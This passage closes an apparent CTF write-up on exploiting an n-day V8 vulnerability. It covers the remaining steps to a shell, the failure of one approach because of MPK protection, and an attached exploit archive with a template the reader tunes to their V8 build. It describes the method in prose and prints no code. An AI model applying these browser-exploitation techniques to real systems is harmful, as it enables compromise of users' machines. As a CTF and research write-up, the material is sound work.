As it turns out, the first approach wouldn’t work because the table is protected by MPK as well. This is documented in the Google Docs documentation. I won’t go into details on how to do the second approach since it just involves a few memory writes to put everything in the right place. It works, and finally, we get a shell:

Yay shell


For the astute, the exploit output incorrectly mentions the Code Pointer Table (CPT). If I am not wrong, this is the predecessor to the JS Dispatch Table. This screenshot was taken way back during the playtesting, and I didn’t have the luxury of time to analyse things in detail back then. Also, I have optimised my exploit a little since then; instead of triggering the vulnerability per JS heap read/write (shockingly unoptimised), we trigger it once at the start and store the “evil” gigantic WASM array.

I think the hardest part of exploiting this n-day (without V8 sandbox) is understanding how the bug works and generating a valid hash collision. I’m not sure when the CTF challenge was set, but I’m a little disappointed that the organisers chose an n-day that already had a write-up published in June. Nonetheless, I thought it was good fun and a chance to brush up on my V8 knowledge.

I’ve also attached 2026-02-24-v8-cve-exploit.zip here. It contains all the files I’ve used in popping a shell during playtesting. Constants in expl_tmpl.js will have to be modified to suit your V8 build.